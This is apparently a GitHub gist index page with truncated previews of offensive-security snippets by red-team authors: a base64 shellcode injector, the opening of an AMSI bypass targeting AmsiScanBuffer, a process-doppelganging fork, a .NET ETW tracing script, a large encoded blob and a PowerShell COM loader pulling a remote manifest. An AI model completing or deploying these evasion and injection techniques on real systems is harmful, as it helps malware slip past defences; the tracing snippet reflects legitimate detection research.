This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* Author: TheWover | |
Description: Injects embedded base64-encoded shellcode into an arbitrary hardcoded process using native Windows 32 API calls. | |
Last Modified: 11/1/2018 | |
*/ | |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
namespace ShellcodeTest |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// TestLoad.cpp : This file contains the 'main' function. Program execution begins and ends there. | |
// | |
#include "pch.h" | |
#include <iostream> | |
#include <windows.h> | |
typedef bool(*testFunction)(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets | |
# Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass | |
# logman stop dotNetTrace -ets | |
# This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe | |
# I got the process ID by running a procmon trace | |
$TargetProcessId = 8256 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Start-DotNetEventCollection | |
{ | |
Param( | |
[Parameter(Position = 0)] | |
[Alias('PSPath')] | |
[String] $TracePath = './dotNetTrace.etl', | |
[Parameter(Position = 1)] | |
[String] $TraceName = 'dotNetTrace' | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public static string run() | |
{ | |
IntPtr dllHandle = LoadLibrary("amsi.dll"); //load the amsi.dll | |
if (dllHandle == null) return "error"; | |
//Get the AmsiScanBuffer function address | |
IntPtr AmsiScanbufferAddr = GetProcAddress(dllHandle, "AmsiScanBuffer"); | |
if (AmsiScanbufferAddr == null) return "error"; | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// TheWover: Forked this. Note to self, make it do this: https://blog.malwarebytes.com/threat-analysis/2018/08/process-doppelganging-meets-process-hollowing_osiris/ | |
// | |
// Ref = src | |
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf | |
// | |
// Credits: | |
// Vyacheslav Rusakov @swwwolf | |
// Tom Bonner @thomas_bonner | |
// |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Win32 & Kernel: | |
https://www.vergiliusproject.com/ | |
http://undocumented.ntinternals.net/ | |
https://www.geoffchappell.com/index.htm | |
Structs: | |
http://terminus.rewolf.pl/terminus/ | |
.NET: | |
https://referencesource.microsoft.com/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
7VlrbBzXdT53dmZ2+VqJS4nUg5RXz1CktF6KkijZkiOSu5Lo8iFpSTm0pVLD3RE50XJnNTMrae0qphI7jtDYjRLAiIMmhdO4iNu4Tds4cYu4jhvAgYoYqVv/cABXtX+0RWsEqYsacRLD7nfuDHeXFFurRf+0yCXn3HPPOffc87iv2Rm593MUIiIVzwcfED1HfjlEH17m8URv+/Mofavu5Y3PieGXN47PWm686NgzjjEXzxqFgu3Fp824UyrErUI8NZaJz9k5M9HUVL8l0HEsTTQsQvR9/ZevLuh9gzbFG0SSaB0auk+7ex9AvGLYSokrvt1UFfONUnw0RGceZlH+r9aVSpZ3+ojGAoefCy3j5BmiRrYTcvtuISaVAvsiNc0I2kdr2gnPvOSx3jWBX+uqdteoOJNwXCdLgW2wUTrcvlgO5EMJx8zbWd9Wtlnqit8kN7DUzO2BU0dlF41eR2K8GJG4FR+XKX9FnQhv/SfQX31fb0Bi3Ga0O6Gy3tsEvZ0twGDZCqLOVYx20fpkSJqMPs3UfZLIXQ1GPemK3QqkwQGjGH7M+uxW7t/GncKNN3r1HWHdXsOt15vI6YaMUmev5cHWySE+g5E61zNKN4jaWtTupyJdop39bKB4N4AsKu3aS5sgK1qSCm3zQ9dMoXrdMaCzEx3qdyrddUon6HpDd13ro10QbuimMOr1SZUeJZ5r6EOK3QFpewOb332fbt/G5lPYRiLqQ1JTY2THADnnoDgUeGJvRNWEGtGpf1XqblHrmtXWZvUxy94M4rZmtUW70V23I1wX+Eu6vYXN+vKNhpoo+Ia1aN3UrHVxPKWvB2jzlO+rQlGaKfk4233Gn05BzLey0YrzJExzt7Hd4VAnvNIb9UhrBJZ8hMfQW91ONvfG9haVnGch26z6MW9bNuZa91N1XWKlH+eePbTZj7NGD4Ki8did23lc3e6SQzo/5TTa3RzFHTI8zs84VguNsKCi6mwG7ITleufOGsF+UNs+ezsG8CmqM7Ig16h3JkDyHYFE |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Make Sure dynwrapx,dll is in %temp% | |
$a = new-object -com Microsoft.Windows.ActCtx | |
$a.ManifestURL = 'https://gist.githubusercontent.com/subTee/36df32293bc5006148bb6b03b5c4b2c1/raw/661b5aafd55288930761d9ad4eabe7403146ab5c/dynwrapx.dll.manifest' | |
$b = $a.CreateObject("DynamicWrapperX") | |
$b.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l") | Out-Null | |
$b.MessageBoxW(0, "Hello, world!", "Test", 4) | Out-Null | |
OlderNewer